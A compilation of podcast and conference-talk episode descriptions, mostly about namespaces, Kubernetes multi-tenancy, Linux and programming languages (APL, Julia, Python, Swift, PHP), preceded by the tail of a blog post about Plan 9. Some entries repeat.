satisfaction/accomplishment/enjoyment. Linux stopped being fun for me when I came to the realization that all distributions are fundamentally the same. I started exploring the BSD world only to realize that all UNIX-like operating systems are fundamentally the same. Although BSD remains a store of fun for me, I occasionally feel burned out on UNIX even if it's an abstract idea/experience/codebase I cherish. When I sit down at a computer my goal is always to discover something new, learn a new concept, explore alternative paradigms, and, most of all, to have fun in the process. For most people, 9 is a tourist experience. For me, it's the final frontier. Although I have yet to learn as much about 9 as I have about UNIX, every time I swap hard drives and boot into 9 I feel a sense of coming home. Sometimes I think I am wilfully resisting becoming a 9 expert because it will result in me struggling to find the next non-bad OS paradigm to explore. And when I think about "using a computer", what do I really do on the computer? I learn about it, learn about the software running on it, and proceed to write about it so that I can reinforce the ideas in a Feynman-esque way. I'm not really providing a real tangible value to the world because it's purely a "hey, here's the things I learned the hard way so you don't have to". Conclusion: How do I do xyz on 9? don't. search engines won't help. Man pages won't help. /sys/doc might help. Reading the source code won't help. have fun :) Or consider: term% vt -xb term% ssh user@host $ tmux a $ reset # some commands $ reset # some commands $ reset Alternatively: term% vncv host:display Further reading: 9front FQA. Very humorous, good information read the papers in /sys/doc or on cat-v.org Plan 9: Not dead, Just resting A visual demonstration of rio A visual demonstration of acme C Programming in Plan 9 from Bell Labs Plan 9 Desktop Guide. Might be useful for someone. Not too useful for me. Man pages are better. C04tl3 youtube channel. Lots of cool videos with information. Introduction to Operating System Abstractions using Plan 9 from Bell Labs SDF public Plan 9 server
In Episode 2, we look at how automation can streamline media & entertainment workflows. Post's Marc Loftus hosts Dell Technologies' Alex Timbs and Arcitecta's Jason Lohrey, who share their insight and expertise.
https://go.dok.community/slack https://dok.community ABSTRACT OF THE TALK When providing data analysis as a service, one must tackle several problems. Data privacy and protection by design are crucial when working on sensitive data. Performance and scalability are fundamental for compute-intensive workloads, e.g. training Deep Neural Networks. User-friendly interfaces and fast prototyping tools are essential to allow domain experts to experiment with new techniques. Portability and reproducibility are necessary to assess the actual value of results. Kubernetes is the best platform to provide reliable, elastic, and maintainable services. However, Kubernetes alone is not enough to achieve large-scale multi-tenant reproducible data analysis. OOTB support for multi-tenancy is too rough, with only two levels of segregation (i.e. the single namespace or the entire cluster). Offloading computation to off-cluster resources is non-trivial and requires the user's manual configuration. Also, Jupyter Notebooks per se cannot provide much scalability (they execute locally and sequentially) and reproducibility (users can run cells in any order and any number of times). The Dossier platform allows system administrators to manage multi-tenant distributed Jupyter Notebooks at the cluster level in the Kubernetes way, i.e. through CRDs. Namespaces are aggregated in Tenants, and all security and accountability aspects are managed at that level. Each Notebook spawns into a user-dedicated namespace, subject to all Tenant-level constraints. Users can rely on provisioned resources, either in-cluster worker nodes or external resources like HPC facilities. Plus, they can plug their computing nodes in a BYOD fashion. Notebooks are interpreted as distributed workflows, where each cell is a task that one can offload to a different location in charge of its execution. BIO Iacopo Colonnelli is a Computer Science research fellow. He received his Ph.D. with honours in Modeling and Data Science at Università di Torino with a thesis on novel workflow models for heterogeneous distributed systems, and his master's degree in Computer Engineering from Politecnico di Torino with a thesis on a high-performance parallel tracking algorithm for the ALICE experiment at CERN. His research focuses on both statistical and computational aspects of data analysis at large scale and on workflow modeling and management in heterogeneous distributed architectures. Dario is an SWE that turned DevOps, and he's regretting this choice day by day. Besides making memes on Twitter that gain more reactions than technical discussions, leading the development of Open Source projects at CLASTIX, an Open Source-based start-up focusing on Multi-Tenancy in Kubernetes. KEY TAKE-AWAYS FROM THE TALK From this talk, people will learn: - The different requirements of Data analysis as a service - How to configure for multi-tenancy at the cluster level with Capsule - How to write distributed workflows as Notebooks with Jupyter Workflows - How to combine all these aspects into a single platform: Dossier All the software presented in the talk is OpenSource, so attendees can directly play with them and include them in their experiments with no additional restrictions.
https://go.dok.community/slack https://dok.community/ From the DoK Day EU 2022 (https://youtu.be/Xi-h4XNd5tE) Accidental PVC delete or namespace delete can cause the Persistent Volume to get deleted. Such volumes lose their data and the stateful applications lose their state. By the use of Persistent Volume TrashCan, users can get a grace period to undo such unintended delete operation. The deleted Persistent Volumes are staged for delayed deletes. They continue to live even after being deleted from k8 perspective, for a configurable time(retention period) and based on the system's usage. The storage class of the PVC can dictate if they need to be staged for a delayed delete. StorageClass can also allow for configurable retention period. To recover a deleted PersistentVolume, users can create a new namespace with the same name and reapply the original PVC spec. The PVC will reference a special StorageClass to indicate that the new PersistentVolume needs to be restored from the TrashCan. This will allow the application to restart with the right state and data. This talk will showcase how to overcome one of the admin's pain point seen in field involving accidental deletions of PVCs by using advanced storage management solutions in Kubernetes. Veda Talakad is a Software professional with BS in electronics and communications mostly working in storage domain. Some of the professional areas of interests include scalability in distributed environment and cloud-native technologies for data management, Aditya Kulkarni: I have 10 years of experiance in Enterprise Data management. I have worked on All Flash Array at Netapp from the device driver layer to WAFL Filesystem. Next, I worked at Portworx where I developed and enhanced the number one data platform for Kubernetes. Then I moved to Pure Storage as part of Portworx acquisition. Aditya Dani is an architect at Portworx by PureStorage, that enables users to run any cloud-native data service, in any cloud, using any Kubernetes platform. He is one of the contributors to the open source project Stork that provides storage awareness to the Kubernetes scheduler. Prior to Portworx, Aditya worked for Amazon on their Music Recommendations Engine. He enjoys working on distributed systems and loves programming in Go.
Unedited live recording of the complete show on YouTube (Ep #162). Includes demos.Topic Links==========Loft LabsVClusterLukas Gentele and Rich Burroughs==========Lukas Gentele on TwitterRich Burroughs on TwitterJoin my Community=========Best coupons for my Docker and Kubernetes coursesChat with us on our Discord Server Vital DevOpsHomepage bretfisher.com★ Support this podcast on Patreon ★
Loft is a platform for Kubernetes self-service and multi-tenancy. Loft allows you to control Kubernetes clusters with added multi-tenancy and self-service capabilities to get more value out of Kubernetes beyond simply cluster management. It allows for cost optimization, more efficient provisioning, and other features. Lukas Gentele joins the show to talk about Kubernetes multi-tenancy and The post Loft Kubernetes Namespaces with Lukas Gentele appeared first on Software Engineering Daily.
Loft is a platform for Kubernetes self-service and multi-tenancy. Loft allows you to control Kubernetes clusters with added multi-tenancy and self-service capabilities to get more value out of Kubernetes beyond simply cluster management. It allows for cost optimization, more efficient provisioning, and other features. Lukas Gentele joins the show to talk about Kubernetes multi-tenancy and The post Loft Kubernetes Namespaces with Lukas Gentele appeared first on Software Engineering Daily.
Loft is a platform for Kubernetes self-service and multi-tenancy. Loft allows you to control Kubernetes clusters with added multi-tenancy and self-service capabilities to get more value out of Kubernetes beyond simply cluster management. It allows for cost optimization, more efficient provisioning, and other features. Lukas Gentele joins the show to talk about Kubernetes multi-tenancy and The post Loft Kubernetes Namespaces with Lukas Gentele appeared first on Software Engineering Daily.
Array Cast - March 5, 2022 Show NotesMany thanks to Adám Brudzewsky for collecting these links.[1] 00:01:23 APL Seeds '22 conference: https://www.dyalog.com/apl-seeds-user-meetings/aplseeds22.htm [2] 00:02:00 APL Quest chat event: https://apl.wiki/APL_Quest [3] 00:02:05 APL Orchard: https://apl.wiki/APL_Orchard [4] 00:02:55 APL Seeds '21 https://www.dyalog.com/apl-seeds-user-meetings/aplseeds21.htm [5] 00:03:38 APL Seeds '22 registration https://us02web.zoom.us/webinar/register/WN_yZb-ha8sRLCJ1DbjAq8nzA [6] 00:04:15 APL Farm: https://apl.wiki/APL_Farm [7] 00:04:20 BQNPad https://bqnpad.mechanize.systems/ [8] 00:06:02 Carlisle Group: https://www.carlislegroup.com/ [9] 00:07:55 APL '99: https://aplwiki.com/wiki/APL_conference#1999[10] 00:10:54 Josh wins second prize: https://www.dyalog.com/news/102/420/2015-APL-Programming-Contest-Winners.htm[11] 00:10:57 And grand prize: https://www.dyalog.com/news/112/420/2016-APL-Programming-Contest-Winners.htm[12] 00:11:04 Winner's presentation: https://dyalog.tv/Dyalog16/?v=afB2IXCBJJ8[13] 00:13:18 Dado Wiki coding practices: https://github.com/the-carlisle-group/Dado/wiki/How-Not-To-Code-In-Dyalog-APL[14] 00:17:23 Paul Mansour's blog: https://www.toolofthought.com[15] 00:18:00 Practical Introduction to APL https://github.com/the-carlisle-group/PracticalAPL[16] 00:18:32 Cas https://github.com/the-carlisle-group/cas-samples[17] 00:18:55 FlipDB https://github.com/the-carlisle-group/FlipDBDoc[18] 00:20:12 Carlisle Group on GitHub: https://github.com/the-carlisle-group[19] 00:23:34 Advent of Code in APL: https://apl.wiki/Advent_of_Code[20] 00:26:25 Outer Product: https://apl.wiki/Outer_Product[21] 00:27:01 ADSP #1 https://adspthepodcast.com/2020/11/20/Episode-0.html[22] 00:29:01 Marshall Lochbaum's intro do APL based on the Outer Product: https://www.youtube.com/watch?v=WlUHw4hC4OY[23] 00:29:23 Inner Product: https://apl.wiki/Inner_Product[24] 00:29:50 Iverson's generalisation of Outer Product: https://www.jsoftware.com/papers/APLDictionary1.htm#dot[25] 00:34:23 Summary of Paul Mansour "Why my mother-in-law has special serving dishes for corn on the cob and I don't" talk: https://www.dyalog.com/user-meetings/dyalog09.htm#24[26] 00:36:03 The Abacus project: https://github.com/the-carlisle-group/Abacus/[27] 00:38:37 Roger's "50" paper: https://www.jsoftware.com/papers/50/[28] 00:39:15 Parenthesis nesting: https://www.jsoftware.com/papers/50/50_05.htm[29] 00:41:25 Finnish book of APL idioms https://www.aplwiki.com/wiki/FinnAPL_idiom_library[30] 00:42:10 APL Quest on "Keeping Things In Balance": https://chat.stackexchange.com/transcript/52405?m=60517971#60517971[31] 00:42:58 Adám's Companion video: https://www.youtube.com/watch?v=El0_RB4TTPA&list=PLYKQVqyrAEj9wDIUyLDGtDAFTKY38BUMN&index=4[32] 00:43:10 Operators Ken Iverson paper https://dl.acm.org/doi/pdf/10.1145/357073.357074[33] 00:45:42 Aaron Hsu's talk "Does APL Need a Type System?": https://www.youtube.com/watch?v=z8MVKianh54[34] 00:48:47 Is-Prefix-Of ⊃⍷ : https://tryapl.org/?clear&q=IsPrefixOf%E2%86%90%E2%8A%83%E2%8D%B7%20%E2%8B%84%20%27ABC%27%20IsPrefixOf%20%27ABCDEF%27%20%E2%8B%84%20%27XYZ%27%20IsPrefixOf%20%27ABCD%27%20%E2%8B%84%20%27ABCD%27%20IsPrefixOf%20%27ABC%27&run[35] 00:49:40 "Default value": https://aplwiki.com/wiki/Fill_element[36] 00:51:02 Average +⌿÷≢ : https://tryapl.org/?clear&q=Average%E2%86%90%2B%E2%8C%BF%C3%B7%E2%89%A2%20%E2%8B%84%20Average%203%201%204%201%205&run[37] 00:51:15 Split ≠⊆⊢ : https://tryapl.org/?clear&q=Split%E2%86%90%E2%89%A0%E2%8A%86%E2%8A%A2%20%E2%8B%84%20%27%2F%27Split%27now%2Fis%2Fthe%2Ftime%27&run[38] 00:51:30 tacit: https://apl.wiki/Tacit_programming[39] 00:52:03 APLcart: https://apl.wiki/APLcart[40] 00:53:30 Dfn: https://apl.wiki/Dfn[41] 00:54:00 Traditional "procedural" functions: https://apl.wiki/Defined_function_(traditional)[42] 00:55:56 Power operator: https://help.dyalog.com/latest/#Language/Primitive%20Operators/Power%20Operator.htm[43] 01:01:30 Big O notation https://en.wikipedia.org/wiki/Big_O_notation[44] 01:02:20 Josh's email: josh {at} dyalog.com[45] 01:02:52 Namespaces: https://apl.wiki/Namespace[46] 01:09:21 Jobs: https://apl.wiki/Jobs[47] 01:10:52 contact at arraycast dot com
This week on Talk Julia, David and Randy discuss the a cuter alternative to the Iris dataset for teaching machine learning: PalmerPenguin.jl. We also dive into some awesome features of Julia's package manager — namely stacked environments — an awesome You Tube channel for learning Julia, and what the difference between using and import is when importing a package into your project. ABOUT THE SHOW Talk Julia is a weekly podcast devoted to the Julia programming language. Join hosts David Amos and Randy Davila as we explore Julia news and resources, learn Julia for ourselves, and share our experience and everything that we've learned.
Section 6. NFTs & Web3 Plumbing 6.1 NFTs: Digital Goods on a Global Ledger [02:21]6.2 A $69 Million Mona Lisa JPEG [08:23]6.3 PFPs: Punks vs. Apes [13:29]6.4 Fan Tokens [22:34]6.5 Axie Infinity & the Play-to-Earn Revolution [26:37]6.6 Looted: Composable NFTs [30:08]6.7 NFT Financialization [32:15]6.8 OpenSea & Friends [35:13]6.9 The Cryptoverse [36:41]6.10 I Said Metaverse, Not Meta [40:41]6.11 Non-Fungible Credentials [43:26]6.12 Namespaces & Data Sharing [46:12]6.13 DeSo Lotteries [48:28]6.14 The Physically Decentralized (Permanent) Web [50:54]6.15 Physical Network Scaling [53:40]
In this episode we'll discuss the main concepts regarding Unified Namespaces, and how to combine MQTT, Historian and OPC UA data!
In this episode, we'll showcase so of the new features we'll be presenting with our FactoryStudio 9.2 release!
Today's episode is on namespaces in swift. Important questions to be addressed in the podcast are: What are NameSpaces? How namespaces are used in objc? What all we need to keep in mind when we have frameworks? (Objc) How namespaces are used in SWIFT? What all we need to keep in mind when we have frameworks? (Objc) How do we define namespaces in swift? Use of struct or enum? Which one is recommended? Guest Name: Bopanna Sadera You can reach out to me on Twitter: @gouravnayyar Background music: https://www.bensound.com/ --- This episode is sponsored by · Anchor: The easiest way to make a podcast. https://anchor.fm/app --- Send in a voice message: https://anchor.fm/gouravnayyar/message
This week on the podcast, fellow Googlers Kaslin Fields and Anthony Bushong chat with hosts Mark Mirchandani and Stephanie Wong about how to optimize your spending with Google Kubernetes Engine. Cost optimization doesn’t necessarily mean lower costs, Kaslin explains. It means running your application the best possible way and accommodating things like traffic spikes while keeping costs as low as possible. As our guests tell us, standard best practices can aid in optimization, but when it comes to efficiently running on a budget, there are more tips and tricks available in GKE. One of GKE’s newest operation modes, Autopilot, means Kubernetes nodes are now managed by Google. Customers pay by the pod so the focus can be on the application rather than the details of clusters and their optimization. Best practices for resource utilization and autoscaling are included with Autopilot. Kaslin and Anthony break up Google’s GKE cost optimization tips into four categories: multi-tenancy, autoscaling, infrastructure choice, and workload best practices and tell us how company culture effects these decisions. Proper education around Kubernetes and GKE specifically is the first step to using resources the most efficiently, Anthony tells us. Keeping tenants separate and resources well managed on multi-tenant clusters is made easier with Namespaces. Scaling pods and the infrastructure around them is an important part of optimization as well, and Anthony helps us understand the best practices for fine tuning the autoscaling features in GKE. Scaling infrastructure to handle spikes or lulls is an automatic feature with Autopilot, helping projects run smoothly. To control workloads efficiency, GKE now offers a host of features, including horizontal, vertical, and multidimensional pod autoscaling. Later, we walk through the steps for implementing some of these optimizations decisions while keeping your application running. GKE Usage Metering is a useful tool for measuring tenant usage in a cluster so resource distribution can be managed easier. Kaslin Fields Kaslin is a Developer Advocate at Google Cloud where she focuses on Google Kubernetes Engine. Anthony Bushong Anthony is a Specialist Customer Engineer at Google Cloud, where he focuses on Kubernetes. Cool things of the week A2 VMs now GA—the largest GPU cloud instances with NVIDIA A100 GPUs blog How carbon-free is your cloud? New data lets you know blog Our third decade of climate action: Realizing a carbon-free future blog Interview Kubernetes site GKE site Best practices for running cost-optimized Kubernetes applications on GKE docs Docker site Autopilot overview docs Namespaces docs Kubernetes best practices: Organizing with Namespaces blog Optimize cost to performance on Google Kubernetes Engine video Using node auto-provisioning docs Scaling workloads across multiple dimensions in GKE blog Enabling GKE usage metering docs Kubernetes in Google Cloud Qwiklabs site Kubernetes Engine Qwiklabs site Cloud Operations for GKE Qwiklabs site Earn the new Google Kubernetes Engine skill badge for free blog Beyond Your Bill videos Cloud On Air Webinar: Hands-on Lab: Optimizing Your Costs on Google Kubernetes Engine site Cloud OnBoard site Adopting Kubernetes with Spotify video
In the history of podcasting, there have been a few Namespaces added to RSS to make podcasting work. Apple added the namespace, Google added the namespace and even Blubrry added the namespace. Now there is a new one done by independent podcasters, app developers, companies and other interested people called the namespace. It's done by the Podcast Index people at https://podcastindex.org. I explain what a namespace is and go over the new tags being added by the "podcast" namespace.
Canonical reveals long-term Ubuntu plans that you might have missed, and the "double ungood" warning from Linus this week.
Canonical reveals long-term Ubuntu plans that you might have missed, and the "double ungood" warning from Linus this week.
Canonical reveals long-term Ubuntu plans that you might have missed, and the "double ungood" warning from Linus this week.
On this episode of BlockChannel, Mckie and Petty go in deeper on the decentralized web with one of the storage related subject matter experts that started it all, David Vorick. If Juan Benet of Filecoin is Microsoft, then David is Steve Jobs to the Siacoin/Skynet ecosystem. Building a decentralized storage protocol can be done in a few ways; David’s team went the route of building their vision iteratively, in hopes the adoption would come. Their vision is now coming into fruition, and we explore how he got here, and where Siacoin/Skynet is going. Show Link(s): Siacoin Website: https://sia.tech Skynet P2P Storage: https://siasky.net Intro/Outro Music “Winterfalls” by Terrell Morris: https://soundcloud.com/terrellmorris/winterfalls-1 Show Sponsor(s): Vanmoof: http://Vanmoof.com Disclaimer: This is not investment advice, it is an engaged discussion on new technology; BlockChannel reminds you to always do your own due diligence before investing in any crypto-related project in the industry.
Note, this is not one of our traditional shows. It is our first remote recording since the pandemic from our favorite bar, and things get candid. We barely talk Salesforce. John curses while Jeremy tries to keep the show on track. It might even be our last show...who knows. Listen at your own discretion.
Haarlem, 1956. No, this isn't an episode about New York, we're talking Haarlem, Netherlands. Guido Van Rossum is born then, and goes on to college in Amsterdam where he gets a degree in math and computer science. He went on to work at the Centrum Wiskunde & Informatica, or CWI. Here, he worked on BSD Unix and the ABC Programming language, which had been written by Lambert Meertens, Leo Geurts, and Steven Pemberton from CWI. He'd worked on ABC for a few years through the 1980s and started to realize some issues. It had initially been a monolithic implementation, which made it hard to implement certain new features, like being able to access file systems and functions within operating systems. But Meertens was an editor of the ALGOL 68 Report and so ABC did have a lot of the ALGOL 68 influences that are prevalent in a number of more modern languages and could compile for a number of operating systems. It was a great way to spend your 20s if you're Guido. But after some time building interpreters and operating systems, many programmers think they have some ideas for what they might do if they just… started over. Especially when they hit their 30s. And so as we turned the corner towards the increasingly big hair of the 1990s, Guido started a new hobby project over the holiday break for Christmas 1989. He had been thinking of a new scripting language, loosely based on ABC. One that Unix and C programmers would be interested in, but maybe not as cumbersome as C had become. So he got to work on an interpreter. One that those open source type hackers might be interested in. ALGOL had been great for math, but we needed so much more flexibility in the 90s, unlike bangs. Bangs just needed Aquanet. He named his new creation Python because he loved Monty Python's Flying Circus. They had a great TV show from 1969 to 1974, and a string of movies in the 70s and early 80s. They've been popular amongst people in IT since I got into IT. Python is a funny language. It's incredibly dynamic. Like bash or a shell, we can fire it up, define a variable and echo that out on the fly. But it can also be procedural, object-oriented, or functional. And it has a standard library but is extensible so you can add libraries to do tons of new things that wouldn't make sense to be built in (and so bloat and slow down) other apps. For example, need to get started with big array processing for machine learning projects? Install TensorFlow or Numpy. Or according to your machine learning needs you have PyTorch, SciPi, Pandas, and the list goes on. In 1994, 20 developers met at the US National Standards Bureau in Maryland, at the first workshop and the first Python evangelists were minted. It was obvious pretty quickly that the modular nature and ease of scripting, but with an ability to do incredibly complicated tasks, was something special. What was drawing this community in. Well, let's start with the philosophy, the Zen of Python as Tim Peters wrote it in 1999: Beautiful is better than ugly. Explicit is better than implicit. Simple is better than complex. Complex is better than complicated. Flat is better than nested. Sparse is better than dense. Readability counts. Special cases aren't special enough to break the rules. Although practicality beats purity. Errors should never pass silently. Unless explicitly silenced. In the face of ambiguity, refuse the temptation to guess. There should be one—and preferably only one—obvious way to do it. Although that way may not be obvious at first unless you're Dutch. Now is better than never. Although never is often better than right now.[a] If the implementation is hard to explain, it's a bad idea. If the implementation is easy to explain, it may be a good idea. Namespaces are one honking great idea—let's do more of those! Those are important enough to be semi-official and can be found by entering “import this” into a python shell. Another reason python became important is that it's multi-paradigm. When I said it could be kinda' functional. Sure. Use one big old function for everything if you're moving from COBOL and just don't wanna' rethink the world. Or be overly object-oriented when you move from Java and build 800 functions to echo hello world in 800 ways. Wanna map reduce your lisp code. Bring it. Or add an extension and program in paradigms I've never heard of. The number of libraries and other ways to extend python out there is pretty much infinite. And that extensibility was the opposite of ABC and why Python is special. This isn't to take anything away from the syntax. It's meant to be and is an easily readable language. It's very Dutch, with not a lot of frills like that. It uses white space much as the Dutch use silence. I wish it could stare at me like I was an idiot the way the Dutch often do. But alas, it doesn't have eyeballs. Wait, I think there's a library for that. So what I meant by white space instead of punctuation is that it uses an indent instead of a curly bracket or keyword to delimit blocks of code. Increase the tabbing and you move to a new block. Many programmers do this in other languages just for readability. Python does it for code. Basic statements included, which match or are similar to most languages, include if, for, while, try, raise, except, class, def, with, break, continue, pass, assert, yield, import and print until python 3 when that became a function. It's amazing what you can build with just a dozen and a half statements in programming. You can have more, but interpreters get slower and compilers get bigger and all that… Python also has all the expressions you'd expect in a modern language, especial lambdas. And methods. And duck typing, or suitability for a method is determined by the properties of an object rather than the type. This can be great. Or a total pain. Which is why they'll eventually be moving to gradual typing. The types of objects are bool, byte array, bytes, complex, dict, ellipsis (which I overuse), float, frozen set, int, list, NoneType (which I try to never use), NotImplementedType, range, set, str, and tuple so you can pop mixed tapes into a given object. Not to be confused with a thruple, but not to not be confused I guess… Another draw of python was the cross-compiler concept. An early decision was to make python cable to talk to c. This won over the Unix and growing Linux crowds. And today we have cross-compilers for C and C++, Go, .Net, Java, R, machine code, and of course, Java. Python 2 came in 2000. We got a garbage collection system and a few other features and 7 point releases over the next 10 years. Python 3 came in 2008 and represented a big change. It was partially backward-compatible but was the first Python release that wasn't fully backward-compatible. We have had 7 point releases in the past 10 years as well. 3 brought changes to function print, simpler syntax, moved to storing strings in unicode by default, added a range function, changed how global variables react inside for-loops, implemented a simpler set of rules for order comparisons, and much more. At this point developers were experimenting with deploying microservices. Microservices is an a software development architecture where we build small services, perhaps just a script or a few scripts daisy chained together, that do small tasks. These are then more highly maintainable, more easily testable, often more scalable, can be edited and deployed independently, can be structured around capabilities, and each of the services can be owned by the team that created it with a contract to ensure we don't screw over other teams as we edit them. Amazon introduced AWS Lambda in 2014 and it became clear quickly that the new micro services paradigm was accelerating the move of many SaaS-based tools to a micro services architecture. Now, teams could build in node or python or java or ruby or c# or heaven forbid Go. They could quickly stand up a small service and get teams able to consume the back end service in a way that is scalable and doesn't require standing up a server or even a virtual server, which is how we did things in EC2. The containerization concept is nothing new. We had chroot in 1979 with Unix v7 and Solaris brought us containerization in 2004. But those were more about security. Docker had shown up in 2013 and the idea of spinning up a container to run a script and give it its own library and lib container, that was special. And Amazon made it more so. Again, libraries and modularization. And the modular nature is key for me. Let's say you need to do image processing. Pillow makes it easier to work with images of almost any image type you can think of. For example, it can display an image, convert it into different types, automatically generate thumbnails, run sooth, blur, contour, and even increase the detail. Libraries like that take a lot of the friction out of learning to display and manage images. But Python can also create its own imagery. For example, Matplotlib generates two dimensional graphs and plots points on them. These can look as good as you want them to look and actually allows us to integrate with a ton of other systems. Van Rossum's career wasn't all python though. He would go on to work at NIST then CNRI and Zope before ending up at Google in 2005, where he created Mondrian, a code review system. He would go to Dropbox in 2013 and retire from professional life in 2019. He stepped down as the “Benevolent dictator for life” of the Python project in 2018 and sat on the Python Steering Council for a term but is no longer involved. It's been one of the most intriguing “Transfers of power” I've seen but Python is in great hands to thrive in the future. This is the point when Python 2 was officially discontinued, and Python 3.5.x was thriving. By thriving, as of mid-202, there are over 200,000 packages in the Python Package Index. Things from web frameworks and web scraping to automation, to graphical user interfaces, documentation, databases, analytics, networking, systems administrations, science, mobile, image management and processing. If you can think of it, there's probably a package to help you do it. And it's one of the easier languages. Here's the thing. Python grew because of how flexible and easy it is to use. It didn't have the same amount of baggage as other languages. And that flexibility and modular nature made it great for workloads in a changing and more micro-service oriented world. Or, did it help make the world more micro-service oriented. It was a Christmas hobby project that has now ballooned into one of the most popular languages to write software in the word. You know what I did over my last holiday break? Sleep. I clearly should have watched more Monty Python so the short skits could embolden me to write a language perfect for making the programmers equivalent, smaller, more modular scripts and functions. So as we turn the corner into all the holidays in front of us, consider this while stuck at home, what hobby project can we propel forward and hopefully end up with the same type of impact Guido had. A true revolutionary in his own right. So thank you to everyone involved in python and everyone that's contributed to those 200k+ projects. And thank you, listeners, for continuing to tun in to the history of computing podcast. We are so lucky to have you.
Willkommen zum Skillbyte-Podcast! Skillbyte ist ihr Partner für digitale Exzellenz. In diesem Podcast geht es um das Thema: Kubernetes: Flexibles und leistungsfähiges Rechenzentrum für Unternehmen // Inhalt // 01:07 - Kubernetes: Aus welchen Komponenten besteht es? Was leistet es? 06:24 - On-Premise und in der Cloud 07:26 - Yaml Beschreibung für Applikation Zielzustand 09:07 - Services, Secrets, Ingress, Namespaces, Loadbalancer,... Wie hängt das zusammen? 13:43 - Namespaces 15:18 - Kubernetes Softwarepakete mit HELM 18:05 - Kubernetes steigert Geschwindigkeit und verkürzt Innovationszyklen 25:32 - Security Checks automatisieren 27:24 - Monitoring durch Health Checks 28:11 - Entwickler übernehmen Verantwortung für Infrastruktur 30:09 - Cloud Native Softwareentwicklung 35:11 - Werkzeuge entwickeln sich schnell DevOps Folge: https://soundcloud.com/skillbyte/skillbyte-podcast-2-devops Was ist die Twelve-Factor App?: https://www.dev-insider.de/was-ist-die-twelve-factor-app-a-894702/ Abonnieren Sie diesen Podcast und besuchen Sie uns auf https://www.skillbyte.de Feedback und Fragen gerne an podcast@skillbyte.de
Hoy os traemos un episodio técnico, en el que hablaremos sobre los Namespaces de PHP que nos permiten ordenar nuestro código PHP.
Hoy os traemos un episodio técnico, en el que hablaremos sobre los Namespaces de PHP que nos permiten ordenar nuestro código PHP.
In this 1 hour long themed episode of AWS TechChat, I am joined by my container yoda Mitch Beaumont explore everything containers in the world of Kubernetes, or is that Kube or K8? It is Kubernetes themed affair, we start the show reminiscing about its history, going back, way back looking at where Kubernetes came from and how we arrived at the position we are today and gave an overview of Kubernetes concepts in the forms of Pods, ReplicaSet, Services, Volumes, NameSpaces, ConfigMaps, Secrets, StatefulSets & DaemonSet. We then speak about CNI (Container Network Interface) and Istio for container networking and service discovery before a bit of a Q&A session on why Kubernetes? Lastly we talk about Amazon’s Kubernetes offerings in the form of Amazon Elastic Kubernetes Service (EKS), AWS Fargate for EKS and how you can get started on Kubernetes journey. Speakers: Shane Baldacchino - Solutions Architect, ANZ, AWS Mitch Beaumont - Solutions Architect, ANZ, AWS Resources: Episode 55 - Container Special https://soundcloud.com/user-684142981/episode-55-container-special CNI custom networking https://docs.aws.amazon.com/eks/latest/userguide/cni-custom-network.html Amazon Elastic Kubernetes Service https://aws.amazon.com/eks/ AWS Fargate https://aws.amazon.com/fargate/ AWS Events: AWS Summit Online on-demand https://aws.amazon.com/events/summits/online/ AWS Innovate AIML Edition on-demand https://aws.amazon.com/events/aws-innovate/machine-learning/ AWS Events and Webinars https://aws.amazon.com/events/
cgroups is a Linux kernel feature that limits, accounts for, and isolates the resource usage of a collection of processes. Engineers at Google started the work on this feature in 2006 under the name "process containers".
In this episode, we discuss working from home, long-winded namespaces, recent news, and looking for different ways to engage with the community.
AWS's rich set of features enable running high-security workloads on Amazon Elastic Kubernetes Service (Amazon EKS). In this session, we explore solutions with the real-life example of how HSBC's cloud services team built a secure multi-tenant platform for the company's application teams to run mission-critical containerized applications on Amazon EKS. Amazon EKS and HSBC engineers discuss security features, best practices, and lessons learned from operating secure Amazon EKS clusters. Topics include network security, Linux host security, AWS Identity and Access Management (IAM)integrations, IAM for service accounts, Kubernetes RBAC and Namespaces, and integrating logging and monitoring of the Kubernetes control-plane and worker nodes.
Steam gets support for Linux namespaces, some distributions are struggling with the shift from Python 2, Arch Linux supports reproducible builds, and GNOME has a new app in beta.
OpenStack's Train release pulls into the station amidst mixed news from supporters, Ubuntu 19.10 has arrived with plenty of tempting features, NGINX's Unit application server receives a big update, IBM's financials continue to disappoint, and some welcome security improvements for Chrome on Android.
Chris finally gets excited about Docker just as Wes tells him it’s time to learn something new. Plus the state of browser extension development, the value of non-technical advice, and your feedback.
Sponsors Sentry use code “devchat” for 2 months free Triplebyte $1000 signing bonus Redisgreen Cachefly Panel Andrew Mason Nate Hopkins Eric Berry David Kumira Joined by Special Guest: Kurtis Rainbolt-Greene Episode Summary Kurtis has been working with Ruby and open source for 12 years. These days he works on maintaining large libraries like VCR. He talks about what VCR is, why it’s useful, and some of its limitations. The real topic of today’s show is Kubernetes. Kubernetes is an open-source container orchestration system for automating application deployment, scaling, and management. Kurtis describes what it is and some of the features it has. The panel discuss about some of the limitations of Kubernetes, and where it really shines in the development lifecycle. Kurtis advises Kubernete users to leave their databases as an outside source and not put them in Kubernetes, as well as other things to avoid. They talk about methods for encrypting information within Kubernetes.The panel discusses how Kubernetes compares to other services and some of the unique features. The panel discusses what it’s like to learn Kubernetes. Kurtis advises listeners who are learning Kubernetes to consult with other people who are experienced with. Kubernetes has some different terms for functions that can be confusing to newcomers. It can take between 3 and 6 complete weekends to become comfortable using Kubernetes. Kurtis shares how to transfer a Rails app into Kubernetes. To get started with Kubernetes on the cheap, find a computer with a decent amount of ram,install Ubuntu and MicroK8s for a perfect tinkering playground. Links Sinatra VCR API pod/container Loki by Grafana Stateless services Namespaces Chef Puppet Dockerfiles Heroku PG Bouncer Hephy Workflow Gitlab Auto DevOps Helm Ubuntu MicroK8s Azure Cloud66 Config maps Ingress Prometheus CD/CI Hashi Follow DevChat on Facebook and Twitter Picks Nate Hopkins: Heroku How To Be Like Walt book Real Genius film Andrew Mason: Peacock VSCode extension Drifting Ruby ep. 181- Intro to Kubernetes David Kimura: Microk8s.io and ‘Microk8s.reset’ command Kubernetes Slack channel Kurtis Rainbolt-Greene: Satisfactory game Kubernetes on Rails video series
